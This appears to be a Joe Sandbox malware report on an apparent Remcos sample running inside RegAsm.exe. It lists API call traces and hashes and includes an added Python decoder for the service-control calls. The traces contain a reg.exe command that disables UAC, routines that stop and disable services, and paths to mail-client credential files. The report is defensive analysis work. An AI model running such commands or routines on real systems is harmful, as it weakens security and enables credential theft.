• lstrcatW.KERNEL32(?,?), ref: 10001038
• lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 1000104B
• lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 10001061
• lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 10001075
• GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 10001090
• lstrlenW.KERNEL32(?,?,?,00000000), ref: 100010B8
Memory Dump Source
• Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
Similarity
• API ID: lstrlen$AttributesFilelstrcat
• String ID:
• API String ID: 3594823470-0
• Opcode ID: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
• Instruction ID: f5da6160d3db499da992451a69b84f141dc83571de07cfa19ff2ab3d93a8fd2c
• Opcode Fuzzy Hash: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
• Instruction Fuzzy Hash: DB21E5359003289BEF10DBA0DC48EDF37B8EF44294F104556E999931A6DE709EC5CF50
APIs
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD19
• OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A41F,00000000), ref: 0041AD2D
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD3A
• ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD6F
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD81
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD84
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Service$CloseHandle$Open$ChangeConfigManager
• String ID:
• API String ID: 493672254-0
• Opcode ID: f0f747c63b9e12e72378a2591e571a85e7fda5b6d41ee6cbe89889ce84539f3f
• Instruction ID: 77e668261cf9ee2bd18e5a0e87596c089765e66a1be6d3c981f75cbf7ed2a716
• Opcode Fuzzy Hash: f0f747c63b9e12e72378a2591e571a85e7fda5b6d41ee6cbe89889ce84539f3f
• Instruction Fuzzy Hash: A7016D311462157AD6111B34AC4EFFB3B6CDB02772F10032BF625965D1DA68CE8195AB
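The two service-related records in this listing (the OpenSCManagerW / OpenServiceW / ChangeServiceConfigW record above, and the OpenServiceW / ControlService record that appears further down) read more clearly once the numeric arguments are mapped back to their winsvc.h names. The following is an added example written for this page, not code from the Joe Sandbox report or from the Remcos sample: a decoder for the report's "Name.Module(args), ref: ADDR" line format that names the access rights, start type and control code, and flags the disable-service and stop-service sequences. Constants are the documented winsvc.h values; the sample lines are copied from the records on this page. Two caveats a triager should keep in mind: the sandbox prints a stack snapshot, so only the leading entries are real parameters and the trailing ones ("?", return addresses such as 0041A41F) belong to the caller; and the 000000FF values in the ChangeServiceConfigW record are left undecoded, since SERVICE_NO_CHANGE is 0xFFFFFFFF and the listing alone does not settle what was pushed. The service name is shown as "?" in the listing, so nothing here claims which service is targeted.

```python
import re
from typing import Optional

# Constants from winsvc.h (Windows SDK); only the subsets needed for the calls in this report.
SC_MANAGER_ACCESS = {
    0x01: "SC_MANAGER_CONNECT",
    0x02: "SC_MANAGER_CREATE_SERVICE",
    0x04: "SC_MANAGER_ENUMERATE_SERVICE",
    0x08: "SC_MANAGER_LOCK",
    0x10: "SC_MANAGER_QUERY_LOCK_STATUS",
    0x20: "SC_MANAGER_MODIFY_BOOT_CONFIG",
}
SERVICE_ACCESS = {
    0x01: "SERVICE_QUERY_CONFIG",
    0x02: "SERVICE_CHANGE_CONFIG",
    0x04: "SERVICE_QUERY_STATUS",
    0x08: "SERVICE_ENUMERATE_DEPENDENTS",
    0x10: "SERVICE_START",
    0x20: "SERVICE_STOP",
    0x40: "SERVICE_PAUSE_CONTINUE",
    0x80: "SERVICE_INTERROGATE",
    0x100: "SERVICE_USER_DEFINED_CONTROL",
}
START_TYPE = {0: "SERVICE_BOOT_START", 1: "SERVICE_SYSTEM_START", 2: "SERVICE_AUTO_START",
              3: "SERVICE_DEMAND_START", 4: "SERVICE_DISABLED"}
CONTROL_CODE = {1: "SERVICE_CONTROL_STOP", 2: "SERVICE_CONTROL_PAUSE",
                3: "SERVICE_CONTROL_CONTINUE", 4: "SERVICE_CONTROL_INTERROGATE"}

# (argument index, lookup table, is_bitmask, parameter name) for the APIs worth decoding.
DECODERS = {
    "OpenSCManagerW":       (2, SC_MANAGER_ACCESS, True,  "dwDesiredAccess"),
    "OpenServiceW":         (2, SERVICE_ACCESS,    True,  "dwDesiredAccess"),
    "ChangeServiceConfigW": (2, START_TYPE,        False, "dwStartType"),
    "ControlService":       (1, CONTROL_CODE,      False, "dwControl"),
}

# One Joe Sandbox API line: "• Name.Module(arg,arg,...), ref: ADDR" or "• Name.Module ref: ADDR".
_LINE = re.compile(
    r"^\s*[•*-]?\s*(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)


def parse_api_line(line: str) -> Optional[dict]:
    """Return {"api", "module", "args", "ref"} for a listing line, or None if it is not an API line."""
    m = _LINE.match(line)
    if not m:
        return None
    raw = m.group("args")
    args = [] if raw is None else [a.strip() for a in raw.split(",")]
    return {"api": m.group("api"), "module": m.group("mod"), "args": args, "ref": int(m.group("ref"), 16)}


def arg_value(args: list, idx: int) -> Optional[int]:
    """Argument idx as an int, or None when it is absent or shown as '?' (unknown at analysis time)."""
    if idx >= len(args) or args[idx] == "?":
        return None
    return int(args[idx], 16)


def decode_call(call: dict) -> Optional[str]:
    """Symbolic rendering of the one argument we care about, e.g. 'dwStartType=SERVICE_DISABLED'."""
    spec = DECODERS.get(call["api"])
    if spec is None:
        return None
    idx, table, is_mask, name = spec
    value = arg_value(call["args"], idx)
    if value is None:
        return f"{name}=?"
    if is_mask:
        names = [n for bit, n in table.items() if value & bit]
        unknown = value & ~sum(table)          # bits the table does not name
        if unknown:
            names.append(hex(unknown))
        return f"{name}={'|'.join(names) or '0'}"
    return f"{name}={table.get(value, hex(value))}"


def find_service_tampering(lines) -> list:
    """Flag ChangeServiceConfigW(..., SERVICE_DISABLED, ...) and ControlService(..., STOP) sequences.
    Each finding: (kind, call address, whether the preceding OpenServiceW asked for the matching right)."""
    findings = []
    access = 0
    for call in filter(None, map(parse_api_line, lines)):
        if call["api"] == "OpenServiceW":
            access = arg_value(call["args"], 2) or 0
        elif call["api"] == "ChangeServiceConfigW" and arg_value(call["args"], 2) == 4:
            findings.append(("disable_service", call["ref"], bool(access & 0x02)))
        elif call["api"] == "ControlService" and arg_value(call["args"], 1) == 1:
            findings.append(("stop_service", call["ref"], bool(access & 0x20)))
    return findings


# Sample input copied from the two service-related records in this report's function listing.
DISABLE_RECORD = """
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD19
• OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A41F,00000000), ref: 0041AD2D
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD3A
• ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD6F
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD81
""".splitlines()

STOP_RECORD = """
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB46
• OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB5A
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB67
• ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB76
""".splitlines()

if __name__ == "__main__":
    for record in (DISABLE_RECORD, STOP_RECORD):
        for call in filter(None, map(parse_api_line, record)):
            print(f"{call['ref']:08X} {call['api']:22s} {decode_call(call) or ''}")
        print(find_service_tampering(record))
```

Run against the two records, the decoder reports OpenServiceW with SERVICE_CHANGE_CONFIG followed by ChangeServiceConfigW with dwStartType=SERVICE_DISABLED at 0041AD6F, and OpenServiceW with SERVICE_STOP followed by ControlService with SERVICE_CONTROL_STOP at 0041AB76; the boolean in each finding confirms the handle was opened with the right the later call needs, which is what distinguishes a purposeful service-tampering routine from incidental SCM use.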
APIs
• GetLastError.KERNEL32(?,?,10003518,100023F1,10001F17), ref: 10003864
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003872
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1000388B
• SetLastError.KERNEL32(00000000,?,10003518,100023F1,10001F17), ref: 100038DD
Memory Dump Source
• Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0
• Opcode ID: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
• Instruction ID: 2a33bd680f99e964f7cdf1ea0b0e713dcb61597015083b2077453114c578dac0
• Opcode Fuzzy Hash: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
• Instruction Fuzzy Hash: 0F012432608B225EF207D7796CCAA0B2BDDDB096F9B20C27AF510940E9EF219C009300
APIs
• GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
• _free.LIBCMT ref: 10005B2D
• _free.LIBCMT ref: 10005B55
• SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B62
• SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
• _abort.LIBCMT ref: 10005B74
Memory Dump Source
• Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
Similarity
• API ID: ErrorLast$_free$_abort
• String ID:
• API String ID: 3160817290-0
• Opcode ID: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
• Instruction ID: 6ab9c425fee0725613b21b3b36aaf5e4259b246f4cabca8c388d0d7fb541d563
• Opcode Fuzzy Hash: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
• Instruction Fuzzy Hash: 8FF0A47A508911AAF212E3346C4AF0F36AACBC55E3F264125F918A619DFF27B9024174
APIs
• GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
• _free.LIBCMT ref: 004482CC
• _free.LIBCMT ref: 004482F4
• SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
• SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
• _abort.LIBCMT ref: 00448313
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: ErrorLast$_free$_abort
• String ID:
• API String ID: 3160817290-0
• Opcode ID: 0dc6b6a3e4ae5b17dec3dccad88ee1f92140bcc2d5108ccd544116d6be2417e2
• Instruction ID: 8d34d3ffa9a8a5ca7629c839d325bdddc3ef58a145117f7ac1d0225592351e3a
• Opcode Fuzzy Hash: 0dc6b6a3e4ae5b17dec3dccad88ee1f92140bcc2d5108ccd544116d6be2417e2
• Instruction Fuzzy Hash: 8EF0A435101B006BF611772A6C06B6F26599BD3B69F36042FFD18962D2EF6DCC42816D
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB46
                                                                                                                                                                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB5A
                                                                                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB67
                                                                                                                                                                                                  • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB76
                                                                                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB88
                                                                                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB8B
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 221034970-0
                                                                                                                                                                                                  • Opcode ID: 754c0925ec177a5049a93b7fce8159a8319844bdb89c9ef35b94d9fd17db8e33
                                                                                                                                                                                                  • Instruction ID: 443f58cffa4f299642b313368f914f767bd977a6fac550f0ec2f38f013616b5a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 754c0925ec177a5049a93b7fce8159a8319844bdb89c9ef35b94d9fd17db8e33
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E4F0F631541318BBD7116F259C49DFF3B6CDB45B62F000026FE0992192EB68DD4595F9
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC4A
                                                                                                                                                                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC5E
                                                                                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC6B
                                                                                                                                                                                                  • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC7A
                                                                                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8C
                                                                                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8F
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 221034970-0
                                                                                                                                                                                                  • Opcode ID: b5aa101f668b8370ae1db4d78aefdcb1539b90a750a7e22220e005daec647db2
                                                                                                                                                                                                  • Instruction ID: 80b71cf000cc834045a6d48b23744411b71cc7e49355023a2f572df053a73ec4
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b5aa101f668b8370ae1db4d78aefdcb1539b90a750a7e22220e005daec647db2
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 73F0C231501218ABD611AF65AC4AEFF3B6CDB45B62F00002AFE0992192EB38CD4595E9
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACB1
                                                                                                                                                                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACC5
                                                                                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACD2
                                                                                                                                                                                                  • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACE1
                                                                                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF3
                                                                                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF6
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 221034970-0
                                                                                                                                                                                                  • Opcode ID: d2f399c3bcd0f1044f14c411125fc5822346b4401d7891a80fcd35a5d0c32c00
                                                                                                                                                                                                  • Instruction ID: 4c72e2560426042a93d841201029be6eaa37955ba2c7d49e75f16ae618c5df44
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d2f399c3bcd0f1044f14c411125fc5822346b4401d7891a80fcd35a5d0c32c00
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 85F0F631501228BBD7116F25AC49DFF3B6CDB45B62F00002AFE0992192EB38CD46A6F9
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • _strpbrk.LIBCMT ref: 0044E7B8
                                                                                                                                                                                                  • _free.LIBCMT ref: 0044E8D5
                                                                                                                                                                                                    • Part of subcall function 0043BD68: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0043BD6A
                                                                                                                                                                                                    • Part of subcall function 0043BD68: GetCurrentProcess.KERNEL32(C0000417,?,00405103), ref: 0043BD8C
                                                                                                                                                                                                    • Part of subcall function 0043BD68: TerminateProcess.KERNEL32(00000000,?,00405103), ref: 0043BD93
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                                                                                                                                                                  • String ID: *?$.$t'`/
                                                                                                                                                                                                  • API String ID: 2812119850-2728941232
                                                                                                                                                                                                  • Opcode ID: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                                                                                                                                                                                  • Instruction ID: bbc13fc8ee10fdca904a4e9292213e09ebfa005f106ef5a16faeda3ce4fd08f7
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C251B175E00209AFEF14DFAAC881AAEF7B5FF58314F24416EE844E7341E6399A018B54
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                                                                                                                                                    • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,?), ref: 10001EAC
                                                                                                                                                                                                    • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                                                                                                                                                    • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                                                                                                                                                    • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3
                                                                                                                                                                                                  • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 1000122A
                                                                                                                                                                                                    • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001855
                                                                                                                                                                                                    • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001869
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                                                                                                                                                                  • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                                                                                                                                  • API String ID: 4036392271-1520055953
                                                                                                                                                                                                  • Opcode ID: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                                                                                                                                                                  • Instruction ID: e2b7c7e1c3038021adfe9ab266432482c710e64fc4cfb1bae4cfd9c1521b4980
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4B21D579E142486AFB14D7A0EC92FED7339EF80754F000556F604EB1D5EBB16E818758
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: ClassCreateErrorLastRegisterWindow
• String ID: 0$MsgWindowClass
• API String ID: 2877667751-2410386613
• Opcode ID: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
• Instruction ID: e808ecd18ef19f47bd472c0c6462b34ef8490c58390ad3ae495a6aa035ed2a4b
• Opcode Fuzzy Hash: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
• Instruction Fuzzy Hash: 1F0125B1D00219ABDB00DFA5EC849EFBBBCEA08355F40453AF914A6241EB7589058AA4
APIs
• CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 004077D6
• CloseHandle.KERNEL32(?), ref: 004077E5
• CloseHandle.KERNEL32(?), ref: 004077EA
Strings
• /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004077CC
• C:\Windows\System32\cmd.exe, xrefs: 004077D1
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: CloseHandle$CreateProcess
• String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
• API String ID: 2922976086-4183131282
• Opcode ID: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
• Instruction ID: 1887ccd63cb29ce90d3c4a9dee080bc6fb52b3336ad705aa4023eed0db3a7680
• Opcode Fuzzy Hash: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
• Instruction Fuzzy Hash: 04F09672D4029C76CB20ABD7AC0EEDF7F3CEBC5B11F00051AF904A2045DA745400CAB5
Strings
• C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 004076FF
• Rmc-EPF38I, xrefs: 00407715
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID:
• String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Rmc-EPF38I
• API String ID: 0-2160439477
• Opcode ID: 9875d9faf70918787a925bf8ffd0fe05ff0f1e0d4d07a7049234b56cd1ae4be9
• Instruction ID: 5ffff352cfcc2e87221e4fa572a01d73507d198e899e6baa5594ec663d9dd15d
• Opcode Fuzzy Hash: 9875d9faf70918787a925bf8ffd0fe05ff0f1e0d4d07a7049234b56cd1ae4be9
• Instruction Fuzzy Hash: 8DF02BB0E04600EBCB1477345D296AA3656A780397F40487BF507EB2F2EBBD5C41871E
APIs
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405120
• SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 0040512C
• WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405137
• CloseHandle.KERNEL32(?), ref: 00405140
  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
Strings
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
